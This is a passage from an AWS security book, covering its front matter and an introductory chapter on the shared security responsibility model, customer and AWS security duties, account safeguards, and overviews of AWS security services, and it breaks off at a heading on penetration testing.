Downloading the color images of this book
We also provide you with a PDF file that has color images of the screenshots/diagrams used
in this book. The color images will help you better understand the changes in the output.
You can download this file from https://www.packtpub.com/sites/default/files/
downloads/MasteringAWSSecurity_ColorImages.pdf.
Errata
Although we have taken every care to ensure the accuracy of our content, mistakes do
happen. If you find a mistake in one of our books-maybe a mistake in the text or the code-
we would be grateful if you could report this to us. By doing so, you can save other readers
from frustration and help us improve subsequent versions of this book. If you find any
errata, please report them by visiting http://www.packtpub.com/submit-errata, selecting
your book, clicking on the Errata Submission Form link, and entering the details of your
errata. Once your errata are verified, your submission will be accepted and the errata will
be uploaded to our website or added to any list of existing errata under the Errata section of
that title.
To view the previously submitted errata, go to
https://www.packtpub.com/books/content/support and enter the name of the book in the
search field. The required information will appear under the Errata section.
Preface
[ 5 ]
Piracy
Piracy of copyrighted material on the Internet is an ongoing problem across all media. At
Packt, we take the protection of our copyright and licenses very seriously. If you come
across any illegal copies of our works in any form on the Internet, please provide us with
the location address or website name immediately so that we can pursue a remedy.
Please contact us at [email protected] with a link to the suspected pirated
material.
We appreciate your help in protecting our authors and our ability to bring you valuable
content.
Questions
If you have a problem with any aspect of this book, you can contact us at
[email protected], and we will do our best to address the problem.
1
Overview of Security in AWS
AWS provides many services, tools and methods such as access control, firewall,
encryption, logging, monitoring, compliance, and so on to secure your journey in cloud.
These AWS services supports plethora of use cases and scenarios to take end to end care of
all your security, logging, auditing and compliance requirement in cloud environment.
There is AWS Identity and Access Management (IAM) service that allows you to control
access and actions for your AWS users and resources securely, Virtual Private Cloud (VPC)
allows you to secure your infrastructure in AWS cloud by creating a virtual network similar
to your own private network in your on premises data center.
Moreover, there are web services such as Key Management Services (KMS) that facilitates
key management and encryption for protecting your data at rest and in transit. There is
AWS Shield and AWS Web Application Firewall (WAF) to protect your AWS resources
and applications from common security threats such as Distributed Denial of Service
(DDoS) by configuring firewalls at various levels.
AWS Config along with AWS CloudTrail and AWS CloudWatch supports logging, auditing
and configuration management for all your AWS resources. AWS Artifact is a managed
self-service that gives you compliance documents on demand for all your compliance
requirements from your auditor.
This book aims to explain the preceding mentioned services, tools, and methods to enable
you in automating all security controls using services provided by AWS such as AWS
Lambda, AWS Simple Notification Service (SNS), and so on. We will learn how
compliance is different from security. We will learn about how security can be implemented
as a continuous activity instead of a periodic activity and how we can achieve continuous
compliance by using AWS services. This chapter will give you an overview of security in
Amazon Web Services, popularly known as AWS or AWS cloud. We'll learn about the
shared security responsibility model of AWS that lies at the very foundation of AWS
Security.
Overview of Security in AWS
[ 7 ]
Chapter overview
In this chapter, we will learn about security in AWS cloud. We will learn about security
processes in place to secure all workloads deployed in AWS environment. We will begin by
exploring AWS shared security responsibility model, a primer for all thing security in AWS.
To secure anything, we first need to know who is responsible for security. We will deep
dive into this fundamental principle of AWS Security to know about security
responsibilities of AWS and users of AWS services for various models that AWS offers to all
its customers.
Moving on, we will go through AWS Security responsibilities in detail across multiple
verticals such as physical security, network security, and so on. We will also go through
various processes AWS has put in place to ensure business continuity and seamless
communication in event of an incident. Alongside, we will walk through customer security
responsibilities for all workloads deployed in AWS cloud. This will include things such as
protecting credentials, data security, access control, and so on.
Furthermore, we will go through security features of your AWS account.
Next, we will go through overview of all security services and features provided by AWS
such as KMS, CloudWatch, Shield, CloudTrail, penetration testing, and so on.
Lastly, we will go through various resources available in AWS for learning more about
these security services and features. These resources include AWS documentation, white
papers, blogs, tutorials, solutions, and so on.
AWS shared security responsibility model
AWS and cloud in general have evolved considerably from the time when security in cloud
was seen as an impediment to moving your data, applications, and workload to cloud to
today when security in cloud is one of the major reasons organizations are moving from
data centers to cloud. More and more executives, decision makers, and key stakeholders are
vouching that security in cloud is further ahead, and more reliable and economical than
security in on-premise data centers. These executives and decision makers are from
multiple geographies, and various industries with stringent security requirements and
regulatory compliance such as Department of Defense, Banking, Health Care, Payment
Card Industry, and so on, and belong to all levels such as CIO, CTO, CEO, CISO, System
Administrators, Project Managers, Developers, Security Analysts, and so on.
Overview of Security in AWS
[ 8 ]
As a result, cloud adoption rate has been rapidly increasing for the past few years across the
globe and across industries. This trend is led by large enterprises where security plays a
pivotal role in deciding if an enterprise should move to the cloud or not. AWS provides
fully integrated and unified security solutions for its cloud services that enables its
customers to migrate their workloads to cloud. Let us look at some predictions for the
exponential growth of Cloud Computing by industry leaders:
Gartner says that by 2020, a corporate no-cloud policy will be as rare as the no-
internet policy today.
Global Cloud Index (GCI) forecasts that cloud will account for 92% of the data
center by 2020, meaning 92% of all data and computing resources will be using
cloud by 2020.
International Data Corporation (IDC) says that today's cloud first strategy is
already moving the towards cloud.
AWS is architected to be one of the most flexible and secure cloud environments. It removes
most of the security burdens that are traditionally associated with IT infrastructure. AWS
ensures complete customer privacy and segregation of customer resources and has scores of
built-in security features. Moreover, every customer benefits from the security processes,
global infrastructure and network architecture put in place by AWS to comply with
stringent security and compliance requirements by thousands of customers across the globe
from scores of industries.
As more and more organizations move towards cloud, security in cloud has been more of a
paradigm shift for many. Even though for the most part, security that is provided in cloud
has most of the same functionalities as security in traditional IT, such as protecting
information from theft, data leakage, and deletion.
However, security in the cloud is in fact slightly different to security in an on-premises data
center. When you move servers, data and workload to AWS cloud, responsibilities are
shared between you and AWS for securing your data and workload. AWS is responsible for
securing the underlying infrastructure that supports the cloud through its global network of
regions, availability zones, edge locations, end points, and so on, and customers are
responsible for anything they put on the cloud such as their data, their application, or
anything that they connect to the cloud such as the servers in their data centers. They are
also responsible for providing access to their virtual network and resources in cloud, this
model is known as AWS shared security responsibility model.
Overview of Security in AWS
[ 9 ]
The following figure depicts this model:
Figure 1 - AWS shared security responsibility model
In order to master AWS Security, it is imperative for us to identify and understand AWS'
share of security responsibilities as well as our share of security responsibilities before we
start implementing them. AWS offers a host of different services that can be distributed in
three broad categories: infrastructure, container, and abstracted services. Each of
these categories has its own security ownership model based on how end users interact
with it and how the functionality is accessed:
Infrastructure Services: This category includes compute services such as
Amazon Elastic Cloud Compute (EC2) and associated services, such as Amazon
Elastic Block Store (EBS), Elastic Load Balancing, and Amazon Virtual Private
Cloud (VPC). These services let you design and build your own secure and
private network on cloud with infrastructure similar to your on-premises
solutions. This network in AWS cloud is also compatible and can be integrated
with your on-premises network. You control the operating system, configure the
firewall rules and operate any identity management system that provides access
to the user layer of the virtualization stack.
Overview of Security in AWS
[ 10 ]
Container Services: There are certain AWS services that run on separate Amazon
EC2 or other infrastructure instances but at times you don’t manage the operating
system or the platform layer. AWS offers these services in a managed services
model for these application containers. You are responsible for configuring
firewall rules, allowing access to your users and systems for these services using
AWS Identity and Access Management (IAM) among other things. These
services include AWS Elastic Beanstalk, Amazon Elastic Map Reduce (EMR) and
Amazon Relational Database Services (RDS).
Abstracted Services: These are AWS services that abstract the platform or
management layer. These are messaging, email, NoSQL database, and storage
services on which you can build and operate cloud applications. These services
are accessed through endpoints by using AWS APIs. AWS manages the
underlying service components or the operating system on which they reside.
You share the underlying infrastructure that AWS provides for these abstracted
services. These services provide a multi-tenant platform which isolates your data
from other users. These services are integrated with AWS IAM for secure access
and usage. These services include Simple Queue Service, Amazon DynamoDB,
SNS, Amazon Simple Storage Service (S3), and so on.
Let us look at these 3 categories in detail along with their shared security responsibility
models:
Shared responsibility model for infrastructure
services
AWS global infrastructure powers AWS infrastructure services such as Amazon EC2,
Amazon VPC and Amazon Elastic Block Storage (EBS). These are regional services; that is,
they operate within the region where they have been launched. They have different
durability and availability objectives. However, it is possible to build systems
exceeding availability objectives of individual services from AWS. AWS provides multiple
options to use various resilient components in multiple availability zones inside a region to
design highly available systems.
Overview of Security in AWS
[ 11 ]
The following figure shows this model:
Figure 2 - Shared responsibility model for infrastructure services
Building on the AWS secure global infrastructure, similar to your on-premises data centers,
you will install, configure, and manage your operating systems and platforms in the AWS
cloud. Once you have your platform, you will use it to install your applications and then
you will store your data on that platform. You will configure the security of your data such
as encryption in transit and at rest. You are responsible for managing how your
applications and end users consume this data. If your business requires more layers of
protection due to compliance or other regulatory requirements, you can always add it on
top of those provided by AWS global infrastructure security layers.
These layers of protection might include securing data at rest by using encryption, or
securing data in transit or by introducing additional layer of opacity between AWS services
and your platform. This layer could includes secure time stamping, temporary security
credentials, data encryption, software and passing digital signature in your API requests
and so on.
AWS provides tools and technologies that can be used to protect your data at rest and in
transit. We'll take a detailed look at these technologies in Chapter 4, Data Security in AWS.
Overview of Security in AWS
[ 12 ]
When you launch a new Amazon Elastic Cloud Compute (EC2) instance from a standard
Amazon Machine Image (AMI), you can access it using the secure remote system access
protocols, such as Secure Shell (SSH) for a Linux instance or Windows Remote Desktop
Protocol (RDP) for a Windows instance. To configure your EC2 instance as per your
requirements and to access it, you are required to authenticate at the operating-system level.
Once you have authenticated at the operating system level, you'll have secure remote access
to the Amazon EC2 instance. You can then set up multiple methods to authenticate
operating systems such as Microsoft Active Directory, X.509 certificate authentication, or
local operating system accounts.
AWS provides Amazon EC2 key pairs that consist of two different keys, a public key and a
private key. These RSA key pairs are the industry standard and used for authentication to
access your EC2 instance. When you launch a new EC2 instance, you get an option to either
create a new key pair or use an existing key pair. There is a third option available as well to
proceed without a key pair, but that is not recommended for securing access to your EC2
instance. The following figure 3 shows the EC2 key pairs option while launching an EC2
instance. You can create as many as 5000 key pairs for your EC2 instances in your AWS
account. EC2 key pairs are used only for accessing your EC2 instances and cannot be used
to login to AWS Management Console or to use other AWS services. Moreover, users can
use different key pairs to access different EC2 instances:
Figure 3 - AWS key pairs
Overview of Security in AWS
[ 13 ]
You can either have AWS generate the EC2 key pairs for you, or you can generate your own
Amazon EC2 key pairs using industry standard tools like OpenSSL. When you choose the
first option, AWS provides you with both the public and private key of the RSA key pair
when you launch the instance. You need to securely store the private key; if it is lost you
can't restore it from AWS, and you will then have to generate a new key pair.
When you launch a new Linux EC2 instance using a standard AWS AMI, the public key of
the Amazon EC2 key pair that is stored within AWS is appended to the initial operating
system user’s ~/.ssh/authorized_keys file. You can use an SSH client to connect to this
EC2 Linux instance by configuring the SSH client to use the EC2's username such as ec2-
user and by using the private key for authorizing a user.
When you launch a new Windows EC2 instance using the ec2config service from a
standard AWS AMI, the ec2config service sets a new random administrator password for
this Windows instance and encrypts it using the corresponding Amazon EC2 key pair’s
public key. You will use the private key to decrypt the default administrator's password.
This password will be used for user authentication on the Windows instance.
Although AWS provides plenty of flexible and practical tools for managing Amazon EC2
keys and authentication for accessing EC2 instances, if you require higher security due to
your business requirements or regulatory compliance, you can always implement
other authentication mechanisms such as Lightweight Directory Access Protocol (LDAP)
and disable the Amazon EC2 key pair authentication.
Shared responsibility model for container
services
The AWS shared responsibility model is applicable to container services as well, such as
Amazon EMR and Amazon RDS. For these services, AWS manages the operating system,
underlying infrastructure, application platform, and foundation services. For example,
Amazon RDS for Microsoft SQL server is a managed database service where AWS manages
all the layers of the container including the Microsoft SQL server database platform. Even
though AWS platform provides data backup and recovery tools for services such as
Amazon RDS, it is your responsibility to plan, configure and use tools to prepare for your
high availability (HA), fault tolerance (FT), business continuity and disaster recovery
(BCDR) strategy.
Overview of Security in AWS
[ 14 ]
You are responsible for securing your data, for providing access to your data and for
configuring firewall rules to access these container services. Examples of firewall rules
include RDS security groups for Amazon RDS and EC2 security groups for Amazon EMR.
The following figure shows this model for container services:
Figure 4 - Shared responsibility model for container services
Shared responsibility model for abstracted
services
AWS offers abstracted services such as Amazon DynamoDB and Amazon Simple Queue
Service, Amazon S3, and so on, where you can access endpoints of these services for storing,
modifying and retrieving data. AWS is responsible for managing these services, that is,
operating the infrastructure layer, installing and updating the operating system and
managing platforms as well. These services are tightly integrated with IAM so you can
decide who can access your data stored in these services.
Overview of Security in AWS
[ 15 ]
You are also responsible for classifying your data and using service-specific tools for
configuring permissions at the platform level for individual resources. By using IAM, you
can also configure permissions based on role, user identity or user groups. Amazon S3
provides you with encryption of data at rest at the platform level, and, for data in transit, it
provides HTTPS encapsulation through signing API requests.
The following figure shows this model for abstracted services:
Figure 5 - Shared responsibility model for abstracted services
AWS Security responsibilities
AWS is responsible for securing the global infrastructure that includes regions, availability
zones and edge locations running on the AWS cloud. These availability zones host multiple
data centers that house hardware, software, networking, and other resources that run AWS
services. Securing this infrastructure is AWS’s number one priority and AWS is regularly
audited by reputed agencies all over the world to meet necessary security and compliance
standard requirements. These audit reports are available to customers from AWS as
customers can't visit AWS data centers in person.
Overview of Security in AWS
[ 16 ]
The following figure depicts the broader areas of security that fall under AWS'
responsibility:
Figure 6 - AWS shared security model - AWS responsibilities
Customer data and workloads are stored in AWS data centers, these data centers are spread
across geographical regions all over world. These data centers are owned, operated and
controlled by AWS. This control includes physical access and entry to these data centers
and all networking components and hardware, and all other additional data centers that are
part of AWS global infrastructure.
Let us take a closer look at other responsibilities that AWS owns for securing its global
infrastructure:
Physical and environmental security
So, the very first thought that would strike anybody considering moving their workload to
cloud is where is my data actually stored? Where are those physical servers and hard drives
located that I provisioned using AWS cloud? And how are those hardware resources
secured and who secures them? After all cloud simply virtualizes all resources available in
a data center but those resources are present somewhere physically. So, the good news is
AWS is completely responsible for physical and environmental security of all hardware
resources located in its data centers across the globe.
AWS has years of experience in building, managing, and securing large data centers across
the globe through its parent company Amazon. AWS ensures that all of its data centers are
secured using the best technology and processes such as housing them in nondescript
facilities, following least privilege policy, video surveillance, two-factor authentication for
entering data centers and floors.
Overview of Security in AWS
[ 17 ]
Personnel are not allowed on data center floors unless they have a requirement to access a
physical data storage device in person. Moreover, AWS firmly implements segregation of
responsibilities principle, so any personnel having access to the physical device won't have
the root user access for that device so he can't access data on that physical device.
This is a very critical part of a shared security responsibility model where AWS does all the
heavy lifting instead of you worrying about the physical and environmental security of
your data centers. You do not have to worry about monitoring, theft, intrusion, fire, natural
calamities, power failure, and so on for your data centers. These things are taken care of by
AWS on your behalf and they constantly upgrade their security procedures to keep up with
increasing threats.
Storage device decommissioning
AWS will initiate a decommissioning process when a storage device has reached the end of
its useful life. This process ensures that customer data is not exposed to unauthorized
individuals. This hardware device will be physically destroyed or degaussed if it fails
decommissioning using the standard process followed by AWS.
Business continuity management
AWS keeps your data and other resources in the data centers in various geographical
locations across the globe; these locations are known as regions. Each region has two or
more availability zones for high availability and fault tolerance. These availability zones are
made up of one or more data centers. All of these data centers are in use and none are kept
offline; that is, there aren't any cold data centers. These data centers house all the physical
hardware resources such as servers, storage, and networking devices, and so on, that are
required to keep all the AWS services up and running as per the service level agreement
provided by AWS. All AWS core applications such as compute, storage, databases,
networking are deployed in an N+1 configuration, so that, in the event of a data center
failure due to natural calamity, human error or any other unforeseen circumstance, there is
sufficient capacity to load-balance traffic to the remaining sites.
Each availability zone is designed as an independent failure zone so that the impact of
failure is minimum and failure can be contained by other availability zone(s) in that region.
They are physically separated within a geographical location and are situated in the lower
risk flood plains.
Overview of Security in AWS
[ 18 ]
Depending on the nature of your business, regulatory compliance, performance
requirements, disaster recovery, fault tolerance, and so on, you might decide to design your
applications to be distributed across multiple regions so that they are available even if a
region is unavailable.
The following figure demonstrates typical regions with their availability zones:
Figure 7 - AWS regions and availability zones
Communication
AWS employs multiple methods of external and internal communication to keep their
customers and global AWS communities updated about all the necessary security events
that might impact any AWS service. There are several processes in place to notify the
customer support team about operational issues impacting customer experience globally,
regionally or for a particular AWS service. AWS provides a Service Health Dashboard at
https://status.aws.amazon.com that provides updates about all AWS services.
Overview of Security in AWS
[ 19 ]
It also has an option to notify AWS about any issue customers are facing with any AWS
service. The AWS Security center is available to provide you with security and compliance
details about AWS. There are 4 support plans available at AWS:
Basic
Developer
Business
Enterprise
These support plans give you various levels of interaction capabilities with AWS support
teams such as AWS technical support, health status and notifications, and so on. However,
24/7 access to customer service and communities is available to all AWS customers
irrespective of the support plan subscription.
The following figure shows the AWS Service Health Dashboard for all North America, you
can also get information for service health in other geographies such as Asia Pacific, Europe,
and so on:
Figure 8 - AWS Service Health Dashboard
Overview of Security in AWS
[ 20 ]
Network security
The AWS network has been architected to allow you to configure the appropriate levels of
security for your business, your workload, and your regulatory compliance requirements. It
enables you to build geographically dispersed, highly available, and fault-tolerant web
architectures with a host of cloud resources that are managed and monitored by AWS.
Secure network architecture
AWS has network devices such as a firewall to monitor and control communications at the
external and key internal boundaries of the network. These network devices use
configurations, access control lists (ACL) and rule sets to enforce the flow of information to
specific information system services. Traffic flow policies or ACLs are established on each
managed interface that enforces and manage traffic flow. These policies are approved by
Amazon information security. An ACL management tool is used to automatically push
these policies, to help ensure these managed interfaces enforce the most up-to-date ACLs.
Secure access points
AWS monitors network traffic and inbound and outbound communications through
strategically placed access points in the cloud; these access points are also known as API
endpoints. They allow secure HTTP access (HTTPS) through API signing process in AWS,
allowing you to establish a secure communication session with your compute instances or
storage resources within AWS.
Transmission protection
You can connect to an AWS access point through HTTP or HTTPS using Secure Sockets
Layer (SSL). AWS provides customers with VPC, their own virtual network in cloud
dedicated to the customer's AWS account. VPC is helpful for customers who require
additional layers of network security. VPC allows communication with customer data
centers through an encrypted tunnel using an IPsec Virtual Private Network (VPN) device.
Overview of Security in AWS
[ 21 ]
Network monitoring and protection
AWS ensures a high level of service performance and availability by employing multiple
automated monitoring systems. These tools monitor unauthorized intrusion attempts,
server and network usage, application usage, and port scanning activities. AWS monitoring
tools watch over ingress and egress communication points to detect conditions and unusual
or unauthorized activities. Alarms go off automatically when thresholds are breached on
key operational metrics to notify operations and management personnel. To handle any
operational issues, AWS has trained call leaders to facilitate communication and progress
during such events collaboratively. AWS convenes post operational issues that are
significant in nature, irrespective of external impact, and Cause of Error (COE) documents
are created so that preventive actions are taken in future, based on the root cause of the
issue.
AWS access
The AWS production network is logically segregated from the Amazon corporate network
and requires a separate set of credentials. It uses a complex set of network segregation and
security devices for isolating these two networks. All AWS developers and administrators
who need to access AWS cloud components for maintenance are required to raise a ticket
for accessing AWS production network. In order to access the production network,
Kerberos, user IDs, and passwords are required by Amazon corporate network. The AWS
production network uses a different protocol; this network mandates the usage of SSH
public-key authentication through a computer in a public domain often known as bastion
host or jump box for AWS developers and administrators.
Credentials policy
AWS Security has established a credentials policy with the required configurations and
expiration intervals. Passwords are regularly rotated once every 90 days and they are
required to be complex.
Overview of Security in AWS
[ 22 ]
Customer security responsibilities
AWS shares security responsibilities with customers for all its offerings. Essentially, the
customer is responsible for security of everything that they decide to put in cloud such as
data, applications, resources, and so on. So network protection and instance protection for
IaaS services and database protection for container services are areas that fall under
customer security responsibilities. Let us look at customer security responsibilities for these
three categories:
For AWS infrastructure services, the customer is responsible for the following:
Customer data
Customer application
Operating system
Network and firewall configuration
Customer identity and access management
Instance management
Data protection (transit, rest, and backup)
Ensuring high availability and auto scaling resources
For AWS container services, the customer is responsible for the following:
Customer data
Network VPC and firewall configuration
Customer identity and access management (DB users and table permissions)
Ensuring high availability
Data protection (transit, rest, and backup)
Auto scaling resources
For AWS abstract services, the customer is responsible for the following:
Customer data
Securing data at rest using your own encryption
Customer identity and access management
Overview of Security in AWS
[ 23 ]
So essentially when we move from AWS infrastructure services towards AWS abstract
services, customer security responsibility is limited to configuration, and operational
security is handled by AWS. Moreover, AWS infrastructure services gives you many more
options to integrate with on-premises security tools than AWS abstract services.
All AWS products that are offered as IaaS such as Amazon EC2, Amazon S3, and Amazon
VPC are completely under customer control. These services require the customer to
configure security parameters for accessing these resources and performing management
tasks. For example, for EC2 instances, the customer is responsible for management of the
guest operating system including updates and security patches, installation and
maintenance of any application software or utilities on the instances, and security group
(firewall at the instance level, provided by AWS) configuration for each instance. These are
essentially the same security tasks that the customer performs no matter where their servers
are located. The following figure depicts customer responsibilities for the AWS shared
security responsibilities model:
Figure 9 AWS shared security model - customer responsibilities
AWS provides a plethora of security services and tools to secure practically any workloads,
but the customer has to actually implement the necessary defenses using those security
services and tools.
Overview of Security in AWS
[ 24 ]
At the top of the stack lies customer data. AWS recommends that you utilize appropriate
safeguards such as encryption to protect data in transit and at rest. Safeguards also include
fine-grained access controls to objects, creating and controlling the encryption keys used to
encrypt your data, selecting appropriate encryption or tokenization methods, integrity
validation, and appropriate retention of data. Customer chooses where to place their data in
cloud, meaning they choose geographical location to store their data in cloud. In AWS, this
geographical location is known as region, so customer has to choose an AWS region to store
their data. Customers are also responsible for securing access to this data. Data is neither
replicated to another AWS Region nor moved to other AWS Region unless customer
decides to do it. Essentially, customers always own their data and they have full control
over encrypting it, storing it at a desired geographical location, moving it to another
geographical location or deleting it.
For AWS container services such as Amazon RDS, the customer doesn't need to worry
about managing the infrastructure, patch update or installation of any application software.
The customer is responsible for securing access to these services using Amazon IAM. The
customer is also responsible for enabling Multi-Factor Authentication (MFA) for securing
their AWS account access.
As a customer, you get to decide on security controls that you want to put in place based on
the sensitivity of your data and applications. You have complete ownership of your data.
You get to choose from a host of tools and services available across networking, encryption,
identity and access management, and compliance.
The following table shows a high-level classification of security responsibilities for AWS
and the customer:
AWS
Customer
Facility operations
Choice of guest operating system
Physical security
Configuring application options
Physical infrastructure
AWS account management
Network infrastructure
Configuring security groups (firewall)
Virtualization infrastructure
ACL
Hardware lifecycle management IAM
Table 2 - AWS Security responsibilities classification
Overview of Security in AWS
[ 25 ]
AWS account security features
Now that we are clear with the shared security responsibilities model, let us deep dive into
the resources provided by AWS to secure your AWS account and resources inside your
AWS account from unauthorized use. AWS gives you a host of tools for securing your
account such as MFA, several options for credentials that can be used to access AWS
services and accounts for multiple use cases, secure endpoints to communicate with AWS
services, centralized logging service for collecting, storing and analyzing logs generated for
all user activities in your AWS account by your resources in your AWS account and logs
from all your applications running in your AWS account. Along with these features, you
also have AWS Trusted Advisor that performs security checks for all AWS services in your
AWS account. All of these tools are generic in nature and they are not tied to any specific
service; they can be used with multiple services.
AWS account
This is the account that you create when you first sign up for AWS. It is also known as
a root account in AWS terminology. This root account has a username as your email
address and password that you use with this username. These credentials are used to log
into your AWS account through the AWS Management Console, a web application to
manage your AWS resources. This root account has administrator access for all AWS
services, hence AWS does not recommend using root account credentials for day-to-day
interactions with AWS; instead, they recommend creating another user with the required
privileges to perform those activities. In some cases, your organization might decide to use
multiple AWS accounts, one for each department or entity for example, and then create
IAM users within each of the AWS accounts for the appropriate people and resources.
Let us look at the following scenarios for choosing strategies for AWS account creation:
Business requirement
Proposed
design
Comments
Centralized security
management
One AWS
account
Centralizes information security
management and minimal overhead.
Separation of production,
development, and testing
environments
Three AWS
accounts
One account each for production,
development, and the testing environment.
Overview of Security in AWS
[ 26 ]
Multiple autonomous
departments
Multiple AWS
accounts
One account each for every autonomous
department of
organization.
Assigns access control and permissions for
every single account. Benefits from
economies of scale.
Centralized security
management
with
multiple autonomous
independent projects
Multiple AWS
accounts
Creates one AWS account for shared
project resources such as Domain Name
Service, User Database, and so on. Create
one AWS account for each autonomous
independent project and grant them
permissions at
granular
level.
Table 3 - AWS account strategies
Having multiple AWS accounts also helps in decreasing your blast radius and reducing
your disaster recovery time. So if there is something wrong with one AWS account, the
impact will be minimal on running business operations, as other accounts will be working
as usual along with their resources. Having multiple AWS accounts also increases security
by segregating your resources across accounts based on the principle of least privilege.
AWS credentials
AWS uses several types of credentials for authentication and authorization as follows:
Passwords
Multi-factor authentication
Access keys
Key pairs
X.509 certificates
We will have a detailed look at these credentials in Chapter 2, AWS Identity and Access
Management.
Overview of Security in AWS
[ 27 ]
Individual user accounts
AWS provides a centralized web service called AWS IAM for creating and managing
individual users within your AWS Account. These users are global entities. They can access
their AWS account through the command line interface (CLI), through SDK or API, or
through the management console using their credentials. We are going to have a detailed
look at IAM in the next chapter.
Secure HTTPS access points
AWS provides API endpoints as a mechanism to securely communicate with their services;
for example, https://dynamodb.us-east-1.amazonaws.com is an API endpoint for AWS
DynamoDB (AWS NoSQL service) for us-east-1 (Northern Virginia) region. These API
endpoints are URLs that are entry points for an AWS web service. API endpoints are secure
customer access points to employ secure HTTPS communication sessions for enabling better
security while communicating with AWS services. HTTPS uses Secure Socket Layer (SSL) /
Transport Layer Security (TLS) cryptographic protocol that helps prevent forgery,
tampering and eavesdropping. The identity of communication parties is authenticated
using public key cryptography.
Security logs
Logging is one of the most important security feature of AWS. It helps with auditing,
governance and compliance in cloud. AWS provides you with AWS CloudTrail that logs all
events within your account, along with the source of that event at 5 minute interval, once it
is enabled. It provides you with information such as the source of the request, the AWS
service, and all actions performed for a particular event.
AWS CloudTrail logs all API calls such as calls made through AWS CLI, calls made
programmatically, or clicks and sign-in events for the AWS Management Console.
AWS CloudTrail will store events information in the form of logs; these logs can be
configured to collect data from multiple regions and/or multiple AWS accounts and can be
stored securely in one S3 bucket. Moreover, these events can be sent to CloudWatch logs
and these logs could be consumed by any log analysis and management tools such as
Splunk, ELK, and so on.
Overview of Security in AWS
[ 28 ]
Amazon CloudWatch is a monitoring service that has a feature CloudWatch log that can be
used to store your server, application and custom log files and monitor them. These log files
could be generated from your EC2 instances or other sources such as batch processing
applications.
We are going to have a detailed look at the logging feature in AWS along with AWS
CloudTrail and Amazon CloudWatch in the subsequent chapters.
AWS Trusted Advisor security checks
The AWS Trusted Advisor customer support service provides best practices or checks
across the following four categories:
Cost optimization
Fault tolerance
Security
Performance
Let us look at alerts provided by the AWS Trusted Advisor for security categories. If there
are ports open for your servers in cloud, that opens up possibilities of unauthorized access
or hacking; if there are internal users without IAM accounts, or S3 buckets in your account
are accessible to the public, or if AWS CloudTrail is not turned on for logging all API
requests or if MFA is not enabled on your AWS root account, then AWS Trusted Advisor
will raise an alert. AWS Trusted Advisor can also be configured to send you an email every
week automatically for all your security alert checks.
The AWS Trusted Advisor service provides checks for four categories; these is, cost
optimization, performance, fault tolerance, and security for free of cost to all users,
including the following three important security checks:
Specific ports unrestricted
IAM use
MFA on root account
Overview of Security in AWS
[ 29 ]
There are many more checks available for each category, and these are available when you
sign up for the business or enterprise level AWS support. Some of these checks are as
follows:
Security groups-Unrestricted access
Amazon S3 bucket permissions
AWS CloudTrail logging
Exposed access keys
The following figure depicts the AWS Trusted Advisor checks for an AWS account. We will
take a deep dive into the Trusted Advisor security checks later in this book:
Figure 10 - AWS Trusted Advisor checks
AWS Config security checks
AWS Config is a continuous monitoring and assessment service that records changes in the
configuration of your AWS resources. You can view the current and past configurations of a
resource and use this information to troubleshoot outages, conduct security attack analysis,
and much more. You can view the configuration at time and use that information to
reconfigure your resources and bring them into a steady state during an outage situation.
Overview of Security in AWS
[ 30 ]
Using Config Rules, you can run continuous assessment checks on your resources to verify
that they comply with your own security policies, industry best practices, and compliance
regimes such as PCI/HIPAA. For example, AWS Config provides managed Config rules to
ensure that encryption is turned on for all EBS volumes in your account. You can also write
a custom Config rule to essentially codify your own corporate security policies. AWS
Config send you alerts in real time when a resource is wrongly configured, or when a
resource violates a particular security policy.
The following figure depicts various rule sets in AWS Config; these could be custom rules
or rules provided out of the box by AWS:
Figure 11 - AWS Config Rules
AWS Security services
Now, let us look at AWS Security services. These are AWS services that primarily provide
ways to secure your resources in AWS. We'll briefly go over these services in this section as
all of these services are discussed in detail in the subsequent chapters.
Overview of Security in AWS
[ 31 ]
AWS Identity and Access Management
AWS IAM enables customers to control access securely for their AWS resources and AWS
users. In a nutshell, IAM provides authentication and authorization for accessing AWS
resources. It supports accessing AWS resources through a web-based management console,
CLI, or programmatically through API and SDK. It has basic features for access control such
as users, groups, roles, and permissions as well as advanced features such as Identity
Federation for integrating with the customer's existing user database, which could be a
Microsoft Active Directory or Facebook, or Google. You can define granular permissions for
all your resources as well as use temporary security credentials for providing access to
external users outside of your AWS account.
AWS Virtual Private Cloud
AWS VPC is an IaaS that allows you to create your own VPN in the cloud. You can
provision your resources in this logically isolated network in AWS. This network can be
configured to connect to your on-premise data center securely. You can configure firewalls
for all your resources in your VPC at instance level and/or subnet level to control traffic
passing in and out of your VPC. VPC has a VPC flow log feature that enables you to collect
information regarding IP traffic of your VPC.
AWS Key Management System (KMS)
AWS KMS is a service that helps you manage keys used for encryption. There are multiple
options for KMS that include bringing your own keys and having them managed by KMS
along with those generated by AWS. This is a fully managed service and integrates with
other AWS Services such as AWS CloudTrail to log all activities for your KMS services. This
service plays an important role in securing the data stored by your applications by
encrypting them.
Overview of Security in AWS
[ 32 ]
AWS Shield
AWS shield protects your web applications running on AWS from managed Distributed
Denial of Service (DDoS) attacks. It is a fully managed service and has two variants,
standard and advanced. AWS shield standard is offered to all customers free of charge and
provides protection from most common attacks that target your applications or websites on
AWS. AWS shield advanced gives you higher levels of protection, integration with other
services such as web application firewalls, and access to the AWS DDoS response team.
AWS Web Application Firewall (WAF)
AWS WAF is a configurable firewall for your web applications, allowing you to filter traffic
that you want to receive for your web applications. It is a managed service and can be
configured either from the management console or through AWS WAF API, so you can
have security checkpoints at various levels in your application by multiple actors such as
developer, DevOps engineer, security analysts, and so on.
AWS CloudTrail
This is a logging service that logs all API requests in and out of your AWS account. It helps
with compliance, auditing, and governance. It delivers a log of API calls to an S3 bucket
periodically. This log can be analyzed by using log analysis tools for tracing the history of
events. This service plays a very important part in Security Automation and Security
Analysis.
AWS CloudWatch
This is a monitoring service that provides metrics, alarms and dashboards for all AWS
Services available in your account. It integrates with other AWS services such as
AutoScaling, Elastic Load Balancer, AWS SNS, and AWS Lambda for automating response
for a metric crossing threshold. It can also collect and monitor logs. AWS CloudWatch can
also be used to collect and monitor custom metrics for your AWS resources or applications.
Overview of Security in AWS
[ 33 ]
AWS Config
AWS Config is a service that lets you audit and evaluates the configuration of your AWS
resources. You can visit the historical configuration of your AWS resources to audit any
incident. It helps you with compliance auditing, operational troubleshooting, and so on.
You will use this service to make sure your AWS resources stay compliant and configured
as per your baseline configuration. This service enables continuous monitoring and
continuous assessment of configuration of your AWS resources.
AWS Artifact
This service gives you all compliance related documents at the click of a button. AWS
Artificat is a self service, on-demand portal dedicated to compliance and audit related
information along with select agreements such as business addendum and non disclosure
agreement, and so on.
Penetration testing
